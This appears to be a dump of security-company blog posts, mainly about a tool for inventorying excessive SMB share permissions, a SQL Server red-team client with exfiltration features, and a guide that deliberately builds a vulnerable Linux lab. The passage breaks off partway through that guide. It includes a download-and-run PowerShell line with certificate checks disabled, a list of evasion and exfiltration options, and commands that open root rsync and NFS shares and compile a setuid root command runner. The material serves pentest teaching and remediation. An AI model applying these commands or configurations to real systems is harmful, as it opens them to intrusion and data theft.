Tracking down system owners, applications, and valid business cases during excessive share remediation efforts can be a huge pain for IAM teams. For a large business, it can mean sorting through hundreds of thousands of share ACLs. So having ways to group and prioritize shares during that effort can be a huge time saver. 

I’ve found that the trick to successful grouping is collecting the right data. To determine what data to collect, I ask myself the standard who, what, where, when, and how questions and then determine where I may be able to get that data from there. 

What shares are exposed? 

  • Share Name: Sometimes, the share name alone can indicate the type of data exposed including high risk shares like C$, ADMIN$, and wwwroot.
  • Share File Count: Directories with no files can be a way to prioritize share remediation when you may be trying to prioritize high-risk shares first.
  • Directory List: Similar to share name, the folders and files in a shared directory can often tell you a lot about context.
  • Directory List Hash: This is simply a hash of the directory listing. While not a hard requirement, it can make identifying and comparing directory listing that are the same a little easier. 

Who has access to them? 

  • Share ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups.
  • NTFS ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups. 

When were they created? 

  • Folder Creation Date: Grouping or clustering creation dates on a timeline can reveal trends that can be tied to business units, applications, and processes that may have introduced excessive share privileges in the past. 

Who created them? 

  • Folder Owner: The folder owner can sometimes lead you to the department or business unit that owns the system, application, or process that created/uses the share.
  • Hostname: Hostname can indicate location and ownership if standardized naming conventions are used. 

Where are they? 

  • Computer Name: The computer name that the hosts share can often be used to determine a lot of information like department and location if a standardized naming convention is used.
  • IP Address: Similar to computer names, subnets are also commonly allocated to computers that do specific things. In many environments, that allocation is documented in Active Directory and can be cross referenced. 

If we collect all of that information during discovery, we can use it to perform grouping based on share name, owner, subnet, folder list, and folder list hash so we can identify large chunks of related shares that can be remediated at once. Don’t want to write the code for that yourself? I wrote PowerHuntShares to help you out.

Introducing PowerHuntShares 

PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers. It is intended to be used by IAM and other security teams to gain a better understanding of their SMB Share attack surface and provide data insights to help group and prioritize share remediation efforts. Below is a quick guide to PowerHuntShares setup, execution (collection & analysis), and reporting. 

Setup 

1. Download the project from https://github.com/NetSPI/Powerhuntshares.

2. From a non-domain system you can load it with the following command:

runas /netonly /user:domain\user PowerShell.exe 
Set-ExecutionPolicy bypass -scope process
Import-Module Invoke-HuntSMBShares.ps1 

Alternatively, you can load it directly from the internet using the following PowerShell script. 

[System.Net.ServicePointManager]::ServerCertificateValidation
Callback = {$true} 

[Net.ServicePointManager]::SecurityProtocol =[Net.Security
ProtocolType]::Tls12 

 
IEX(New-Object System.Net.WebClient).DownloadString
("https://raw.githubusercontent.com/NetSPI/
PowerHuntShares/main/PowerHuntShares.psm1") 

Collection

The Invoke-HuntSMBShares collection function wraps a few modified functions from PowerView and Invoke-Parallel. The modifications grab additional information, automate common task sequences, and generate summary data for the reports. Regardless, a big shout out for the nice work done by Warren F. and Will Schroeder (however long ago). Below are some command examples. 

Run from domain joined system 
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test
Run from a non-domain joined system
runas /netonly /user:domain\user PowerShell.exe
Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10` 
-OutputDirectory c:\folder\`
-DomainController 10.1.1.1` 
-Credential domain\user
=============================================================== 
PowerHuntShares
=============================================================== 
 This function automates the following tasks:

 o Determine current computer's domain
 o Enumerate domain computers
 o Filter for computers that respond to ping requests
 o Filter for computers that have TCP 445 open and accessible
 o Enumerate SMB shares
 o Enumerate SMB share permissions
 o Identify shares with potentially excessive privileges
 o Identify shares that provide reads & write access
 o Identify shares that are high risk
 o Identify common share owners, names, & directory listings
 o Generate creation, last written, & last accessed timelines
 o Generate html summary report and detailed csv files

 Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
--------------------------------------------------------------- 
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems.
[*][03/01/2021 09:37] Scan Complete
--------------------------------------------------------------- 
SHARE ANALYSIS
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
--------------------------------------------------------------- 
SHARE REPORT SUMMARY
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] Run time: 00:02:23.2759086
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37]   because 49 systems had open ports and there are typically two default shares.
[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs were found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37]   - 4 backup
[*][03/01/2021 09:37]   - 2 ssms
[*][03/01/2021 09:37]   - 1 test2
[*][03/01/2021 09:37]   - 1 test1
[*][03/01/2021 09:37]   - 1 users
[*] ----------------------------------------------- 

Analysis

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges 

Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. They all provide domain users access to the affected shares due to privilege inheritance issues.

High Risk Shares 

In the context of this report, high-risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes wwwroot, inetpub, c, and c$ shares. However, additional exposures may exist that are not called out beyond that.

Reporting

The script will produce an HTML report, csv data files, and html files.

HTML Report 

The HTML report should have links to all the content. Below is a quick screenshot of the dashboard. It includes summary data at the computer, share, and share ACL level. It also has a fun share creation timeline so you can identify those share creation clusters mentioned earlier. It was my first attempt at generating that type of HTML/CSS with PowerShell, so while it could be better, at least it is a functional first try. 😊 It also includes data grouping summaries in the “data insights” section. 
 
Note: The data displayed in the creation timeline chart seems to be trustworthy, but the last accessed/modified timeline charts seem to be a little less dependable. I believe it has something to do with how they are used by the OS, but that is a research project for another day. 

A screenshot of the Powerhunt Shares dashboard. Includes summary data at the computer, share, and share ACL level.
CSV Files

The Invoke-HuntSMBShares script will generate all kinds of .csv files, but the primary file of interest will be the “Inventory-Excessive-Privileges.csv” file. It should contain all the data discussed earlier on in this blog and can be a good source of data for additional offline analysis.

A detailed screenshot of the Inventory-Excessive-Privileges.csv generated by the Invoke-HuntSMBShares script.A detailed screenshot of the Inventory-Excessive-Privileges.csv generated by the Invoke-HuntSMBShares script.

PowerShell can be used to import the .csv files and do additional analysis on the spot, which can be handy from both the blue and red team perspectives.

A screenshot detailing how PowerShell can be used to import.csv files for additional analysis.

Wrap Up

This was a fun blog to write, and we covered a lot of ground, so below is a quick recap:

  • IAM and red teams can leverage Active Directory to help create an inventory of systems, shares, and share permissions.
  • Remediation efforts can be expedited through simple data grouping techniques if the correct information is collected when creating your share inventory.
  • The builtin\users group implicitly includes domain users when joined to Active Directory domains through a group inheritance chain.
  • Shares configured with excessive permissions can lead to RCE in various ways.
  • Windows event IDs can be used to identify authenticated scanning (540, 4624, 680,4625) and share access (5140) happening in your environment.
  • PowerHuntShares is an open-source tool that can be used to get you started.

In the long term, my hope is to rewrite PowerHuntShares in C# to improve performance and remove some of the bugs. Hopefully, the information shared in this blog helped generate some awareness of the issues surrounding excessive permissions assigned to SMB shares in Active Directory environments. Or at least serves as a place to start digging into the solutions. 

Remember, share audits should be done on a regular cadence so you can identify and remediate high risk share permissions before they become a threat. It is part of good IT and offensive security hygiene, just like a penetration testing, adversary simulation, or red team operations

For more on this topic, watch NetSPI’s webinar, How to Evaluate Active Directory SMB Shares at Scale.

Good luck and happy hunting!

[post_title] => Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments [post_excerpt] => Learn how to quickly inventory, attack, and remediate network shares configured with excessive permissions assigned to SMB shares in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => network-share-permissions-powerhuntshares [to_ping] => [pinged] => [post_modified] => 2023-04-28 14:13:20 [post_modified_gmt] => 2023-04-28 19:13:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28175 [menu_order] => 226 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 28131 [post_author] => 53 [post_date] => 2022-08-04 10:26:57 [post_date_gmt] => 2022-08-04 15:26:57 [post_content] =>
Watch Now

Vulnerability management programs often fail to identify excessive network share permissions, which can be a major security issue. Excessive share permissions have become a risk for data exposure, ransomware attacks, and privilege escalation within enterprise environments.

In this discussion, NetSPI's Vice President of Research Scott Sutherland will talk about why these security issues exist. He will explain how to identify and manage excessive access to common network shares within Active Directory environments.

Join the conversation to see Scott’s latest open source project PowerHuntShares in action and to learn:

  • Common reasons why shares permissions are configured with excessive privileges 
  • How to quickly inventory excessive share permissions across an entire Active Directory domain
  • How to efficiently triage those results to help reduce risk for your organization

[wonderplugin_video iframe="https://youtu.be/TtwyQchCz6E" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => How to evaluate Active Directory SMB shares at scale [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evaluating-active-directory-smb-shares-at-scale [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:56:10 [post_modified_gmt] => 2023-08-22 14:56:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=28131 [menu_order] => 36 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 28035 [post_author] => 17 [post_date] => 2022-07-01 12:19:00 [post_date_gmt] => 2022-07-01 17:19:00 [post_content] =>

On July 1, 2022, NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. Read the summary below or watch the video online.

+++

  • Many vendors promote 100% coverage, but most EDRs and MSSP vendors only provide 20% of that coverage.
  • Companies that partner with MSSP vendors must view their contracts carefully to understand what malicious activities vendors cover.
  • Companies are overdependent on Indicators of Compromise (IOCs) – provided and available in the community – but these tools should be part of a larger program, not the end of the program.
  • Detection starts with a procedure like the popular MITRE Attack Framework.
  • Two challenges of building a behavior-based threat detection? Mapping technique coverages holistically and choosing which procedures to get coverage.
  • Review annual reports from threat detection companies to get a picture of the most common techniques and leverage your threat detection resources.
[post_title] => Help Net Security: The Challenges and Advantages of Building Behavior-based Threat Detection [post_excerpt] => NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-building-behavior-based-threat-detection [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:29 [post_modified_gmt] => 2023-01-23 21:10:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28035 [menu_order] => 237 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 25884 [post_author] => 53 [post_date] => 2021-07-12 15:36:48 [post_date_gmt] => 2021-07-12 20:36:48 [post_content] =>

Ransomware is a strategy for adversaries to make money – a strategy that’s proven successful. In this webinar, NetSPI’s Scott Sutherland and Alexander Polce Leary will cover how ransomware works, ransomware trends to watch, best practices for prevention, and more. At the core of the discussion, Scott and Alexander will explain how to build detections for common tactics, techniques, and procedures (TTPs) used by ransomware families and how to validate they work, ongoing, as part of the larger security program. Participants will leave this webinar with actionable advice to ensure their organization is more resilient to ever-evolving ransomware attacks.

[post_title] => How to Build and Validate Ransomware Attack Detections [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => build-validate-ransomware-attack-detections [to_ping] => [pinged] => [post_modified] => 2023-09-20 11:35:19 [post_modified_gmt] => 2023-09-20 16:35:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=25884 [menu_order] => 51 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 19547 [post_author] => 53 [post_date] => 2020-08-04 11:37:01 [post_date_gmt] => 2020-08-04 16:37:01 [post_content] =>

Mainframes run the global economy and are at the heart of many of the world’s largest financial institutions. During this webinar, we will be interviewing our Mainframe security partner Chad Rikansrud from BMC. Chad will be discussing what mainframes are, how they can be a risk, and what companies can do to identify security holes before the bad guys do.

https://youtu.be/K0JNYXU-86w
[post_title] => Why zOS Mainframe Security Matters [post_excerpt] => Mainframes run the global economy and are at the heart of the many of the world’s largest financial organizations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => why-zos-mainframe-security-matters [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:09:48 [post_modified_gmt] => 2023-09-01 12:09:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19547 [menu_order] => 69 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 19230 [post_author] => 53 [post_date] => 2020-06-02 13:49:41 [post_date_gmt] => 2020-06-02 13:49:41 [post_content] =>
Watch Now

Your employees were probably working from home more and more anyway, but the COVID-19 situation has taken work from home to a whole new level for many companies. Have you really considered all the security implications of moving to a remote workforce model?

Chances are you and others are more focused on just making sure people can work effectively and are less focused on security. But at times of crisis – hackers are known to increase their efforts to take advantage of any weak links they can find in an organization’s infrastructure.

Host-based security represents a large surface of attack that continues to grow as employees become increasingly mobile and work from home more often. Join our webinar to make sure your vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce.

[wonderplugin_video iframe="https://youtu.be/YMmK74ilyew" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Host-Based Security: Staying Secure While Your Employees Work from Home [post_excerpt] => Watch this on-demand webinar to make sure you are vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => host-based-security-staying-secure-while-your-employees-work-from-home-2 [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:12:05 [post_modified_gmt] => 2023-09-01 12:12:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19230 [menu_order] => 71 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 19772 [post_author] => 53 [post_date] => 2020-05-20 10:46:24 [post_date_gmt] => 2020-05-20 10:46:24 [post_content] =>

Watch the second webinar in our Lunch & Learn Series below!

Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments, it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, Scott covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. He also shares a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.

This presentation was originally developed for the Troopers20 conference, but due to the current travel constraints we’ll be sharing it online during this webinar.

https://youtu.be/Y0kD-xCZ3aI
[post_title] => SQL Server Hacking Tips for Active Directory Environments Webinar [post_excerpt] => During this presentation, NetSPI's Scott Sutherland covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sql-server-hacking-tips-for-active-directory-environments-webinar [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:14:17 [post_modified_gmt] => 2023-09-01 12:14:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19772 [menu_order] => 74 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 11555 [post_author] => 17 [post_date] => 2020-05-04 07:00:04 [post_date_gmt] => 2020-05-04 07:00:04 [post_content] =>
Esc Logo

Evil SQL Client (ESC) is an interactive .NET SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

This blog will provide a quick overview of the tool. For those who just want the code, it can be downloaded from https://github.com/NetSPI/ESC.

Why another SQL Server attack client?

PowerUpSQL and DAFT (A fantastic .net port of PowerUpSQL written by Alexander Leary) are great tool sets, but during red team engagements they can be a little too visible.  So to stay under the radar we initially we created a series of standalone .net functions that could be executed via alternative mediums like msbuild inline tasks.  Following that, we had a few clients request to exfiltrate data from the SQL Server using similar evasion techniques.  So we created the Evil SQL Client console to help make the testing process faster and the report screenshots easier to understand :) .

Summary of Executions Options

The Evil SQL Client console and functions can be run via:

  • Esc.exe  Esc.exe is the original application created in visual studio.
  • Esc.csproj is a msbuild script that loads .net code directly through inline tasks. This technique was researched and popularized by Casey Smith (@subTee).  There is a nice article on detection worth reading by Steve Cooper (@BleepSec)  here.
  • Esc.xml is also a msbuild script that uses inline tasks, but it loads the actual esc.exe assembly through reflection.  This technique was shared by @bohops in his GhostBuild project.  It also leverages work done by @mattifestation.
  • Esc-example.ps1 PowerShell script: Loads esc.exe through reflection.  This specific script was generated using Out-CompressDll by @mattifestation.

Below is a simple screenshot of the the Evil SQL Client console executed via esc.exe:

Start Esc Compile

Below is a simple screenshot of the the Evil SQL Client console being executed through MSBuild:

Esc Msbuild

Summary of Features/Commands

At the moment, ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there. Below is a summary of the features that do exist.

DiscoveryAccessGatherEscalateExfil
Discover fileCheck accessSingle instance queryCheck loginaspwSet File
Discover domainspnCheck defaultpwMulti instance queryCheck uncinjectSet FilePath
Discover broadcastShow accessList serverinfoRun oscmdSet icmp
Show discoveredExport accessList databasesSet icmpip
Export discoveredList tablesSet http
List linksSet httpurl
List logins
List rolemembers
List privy*All query results are exfiltrated via all enabled methods.

For more information on available commands visit: https://github.com/NetSPI/ESC/blob/master/README.md#supportedcommands

Wrap Up

Hopefully, the Evil SQL Client console will prove useful on engagements and help illustrate the need for a larger time investment in detective control development surrounding MSBuild inline task execution, SQL Server attacks, and basic data exfiltration.   For more information regarding the Evil SQL Client (ESC), please visit the github project.

Below are some additional links to get you started on building detections for common malicious Msbuild and SQL Server use:

Good luck and hack responsibly!

[post_title] => Evil SQL Client Console: Msbuild All the Things [post_excerpt] => Evil SQL Client (ESC) is an interactive .net SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evil-sql-client-console-msbuild-all-the-things [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:18 [post_modified_gmt] => 2021-06-08 22:00:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11555 [menu_order] => 500 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 18158 [post_author] => 53 [post_date] => 2020-04-07 10:18:04 [post_date_gmt] => 2020-04-07 15:18:04 [post_content] =>

During this webinar we’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. Scott will also share a few PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments.

https://youtu.be/A_hZHwisRxc
[post_title] => Attacking SQL Server CLR Assemblies [post_excerpt] => Watch this on-demand webinar on Attacking SQL Server CLR Assemblies with NetSPI’s Scott Sutherland. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-sql-server-clr-assemblies [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:15:41 [post_modified_gmt] => 2023-09-01 12:15:41 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18158 [menu_order] => 76 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [23] => WP_Post Object ( [ID] => 11391 [post_author] => 17 [post_date] => 2020-03-27 07:00:57 [post_date_gmt] => 2020-03-27 07:00:57 [post_content] => This blog will share how to configure your own Linux server with the vulnerabilities shown in the "Linux Hacking Case Studies" blog series. That way you can practice building and breaking at home. Similar to the rest of the series, this blog is really intended for people who are new to penetration testing, but hopefully there is a little something for everyone. Enjoy! Below are links to the first four blogs in the series: Below is an overview of what will be covered in this blog:

Lab Scenarios

This section briefly summarizes the lab scenarios that you'll be building which are based on this blog series.
# REMOTE VULNERABILITY LOCAL VULNERABILITY ESCALATION PATH
1 Excessive privileges configured on a Rsync Server Excessive privileges configured on a Rsync server.  Specifically, the server is configured to run as root. Create a new privileged user by adding lines to the shadow, passwd, groups, and sudoers files.
2 Excessive privileges configured on a NFS Export  Insecure setuid binary that allows arbitrary code execution as root. Review setuid binaries and determine which ones have the direct or indirect capability to execute arbitrary code as root.
3 Weak password configured for phpMyAdmin Excessive privileges configured on a script that is executed by a root cron job.  Specifically, the script file is world writable. Write a command to the world writable script that starts a netcat listener.  When the root cron job executes the script the netcat listener will start as root. Then its possible to connect to the netcat listeners remotely to obtain root access. Reverse shell alternatives here.
4 Weak password configured for SSH Insecure sudoers configurations that allows arbitrary code execution as root through sudo applications. Review sudo applications to determine which ones have the direct or indirect capability to execute arbitrary code as root. Examples include sh, VI, python, netcat, and the use of a custom nmap module.

Kali VM and Install Dependencies

For this lab, we'll be building our vulnerable services on a standard Kali image.  If you don't already have a Kali VM, you can download from their site website to get you setup.  Once your Kali VM is ready to go you'll want to install some package that will be required for setting up the scenarios in the lab.  Make sure to sign as root, you'll need those privilege to setup the lab. Install Required Packages
apt-get update
apt-get install nfs-kernel-server
apt-get install nfs-common
apt-get install ufw
apt-get install nmap
Clear Firewall Restrictions
iptables --flush
ufw allow from any to any
ufw status
With that out of the way let's dive in.

Lab Setup: Rsync

Attack Lab: Linux Hacking Case Study Part 1: Rsync In this section we'll cover how to configure an insecure Rsync server.  Once you're logged in as root execute the commands below. Let's start by creating the rsyncd.conf configuration file with the commands below:
echo "motd file = /etc/rsyncd.motd" > /etc/rsyncd.conf
echo "lock file = /var/run/rsync.lock" >> /etc/rsyncd.conf
echo "log file = /var/log/rsyncd.log" >> /etc/rsyncd.conf
echo "pid file = /var/run/rsyncd.pid" >> /etc/rsyncd.conf
echo " " >> /etc/rsyncd.conf
echo "[files]" >> /etc/rsyncd.conf
echo " path = /" >> /etc/rsyncd.conf
echo " comment = Remote file share." >> /etc/rsyncd.conf
echo " uid = 0" >> /etc/rsyncd.conf
echo " gid = 0" >> /etc/rsyncd.conf
echo " read only = no" >> /etc/rsyncd.conf
echo " list = yes" >> /etc/rsyncd.conf
Rsync Next, let's setup the rsync Service:
systemctl enable rsync
systemctl start rsync
or
systemctl restart rsync
Verify the Configuration
rsync 127.0.0.1::
rsync 127.0.0.1::files
Rsync

Lab Setup: NFS

Attack Lab: Linux Hacking Case Study Part 2: NFS In this section we cover how to configure insecure NFS exports and an insecure setuid binary.  Once you're logged in as root execute the commands below.

Configure NFS Exports

Create NFS Exports
echo "/home *(rw,sync,no_root_squash)" >> /etc/exports
echo "/ *(rw,sync,no_root_squash)" >> /etc/exports
Start NFS Server
systemctl start nfs-kernel-server.service
systemctl restart nfs-kernel-server
Verify NFS Export
showmount -e 127.0.0.1
Nfs Create Password Files for Discovery
echo "user2:test" > /root/user2.txt
echo "test:password" > /tmp/creds.txt
echo "test:test" > /tmp/mypassword.txt
Nfs Enable password authentication through SSH.
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service ssh restart

Create Insecure Setuid Binary

Create the source code for a binary that can execute arbitrary OS commands called exec.c:
echo "#include <stdlib.h>" > /home/test/exec.c
echo "#include <stdio.h>" >> /home/test/exec.c
echo "#include <unistd.h>" >> /home/test/exec.c
echo "#include <string.h>" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo "int main(int argc, char *argv[]){" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("%s,%dn", "USER ID:",getuid());" >> /home/test/exec.c
echo " printf("%s,%dn", "EXEC ID:",geteuid());" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("Enter OS command:");" >> /home/test/exec.c
echo " char line[100];" >> /home/test/exec.c
echo " fgets(line,sizeof(line),stdin);" >> /home/test/exec.c
echo " line[strlen(line) - 1] = ''; " >> /home/test/exec.c
echo " char * s = line;" >> /home/test/exec.c
echo " char * command[5];" >> /home/test/exec.c
echo " int i = 0;" >> /home/test/exec.c
echo " while(s){" >> /home/test/exec.c
echo " command[i] = strsep(&s," ");" >> /home/test/exec.c
echo " i++;" >> /home/test/exec.c
echo " }" >> /home/test/exec.c
echo " command[i] = NULL;" >> /home/test/exec.c
echo " execvp(command[0],command);" >> /home/test/exec.c
echo "}" >> /home/test/exec.c
Compile exec.c:
gcc -o /home/test/exec exec.c
rm exec.c
Configure setuid on exec so that we can execute commands as root:
chmod 4755 exec
Nfs Verify you can execute the exec binary as a least privilege user. Nfs

Lab Setup: phpMyAdmin

Attack Lab: Linux Hacking Case Study Part 3: phpMyAdmin In this section we'll cover how to configure an insecure instance of phpMyAdmin, a root cron job, and a script that's world writable.  Once you're logged in as root execute the commands below.

Reset the root Password (this is mostly for existing MySQL instances)

We'll start by resetting the root password on the local MySQL instance.  MySQL should be installed by default in Kali, but if it's not on your build you'll have to install it first.
# Stop mysql
/etc/init.d/mysql stop

# Start MySQL in safe mode and log in as root
